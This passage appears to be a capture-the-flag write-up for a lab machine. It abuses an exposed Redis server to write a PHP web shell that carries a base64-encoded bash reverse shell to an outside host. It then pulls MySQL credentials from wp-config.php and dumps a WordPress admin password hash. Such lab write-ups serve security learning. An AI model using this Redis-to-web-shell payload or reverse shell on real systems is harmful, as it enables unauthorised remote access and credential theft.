/etc/systemd/system/redis.service to locate where you can write files
reverse shell
192.168.191.166:6379> flushall
OK
192.168.191.166:6379> config get dir
1) "dir"
2) "/opt/redis-files"
192.168.191.166:6379> config set dbfilename test.php
OK
192.168.191.166:6379> set test "<?php system('echo c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC40OS4xOTEvODAgMD4mMQ== | base64 -d | bash'); ?>"
OK
192.168.191.166:6379> save
OK
then trigger the test.php file you created. If you have LFI you can do so with something like below
Enumerated wp-config.php file to get the MySQL login. (karl / Wordpress1234)
Enumerated users in the db and nothing interesting there.
Running LSE only shows us one interesting item which is a cron running as root every 3 minutes.
alice@readys:/var/www$ mysql -u karl -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 106
Server version: 10.3.31-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| wordpress |
+--------------------+
2 rows in set (0.001 sec)
MariaDB [(none)]> use wordpress;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [wordpress]> show tables;
+-----------------------+
| Tables_in_wordpress |
+-----------------------+
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_termmeta |
| wp_terms |
| wp_usermeta |
| wp_users |
+-----------------------+
12 rows in set (0.000 sec)
MariaDB [wordpress]> select * from wp_users;
+----+------------+------------------------------------+---------------+---------------+------------------+---------------------+---------------------+-------------+--------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+---------------+------------------+---------------------+---------------------+-------------+--------------+
| 1 | admin | $P$Ba5uoSB5xsqZ5GFIbBnOkXA0ahSJnb0 | admin | [email protected] | http://localhost | 2021-07-11 16:35:27 | | 0 | admin |
+----+------------+------------------------------------+---------------+---------------+------------------+---------------------+---------------------+-------------+--------------+
1 row in set (0.000 sec)
MariaDB [wordpress]> quit
Bye
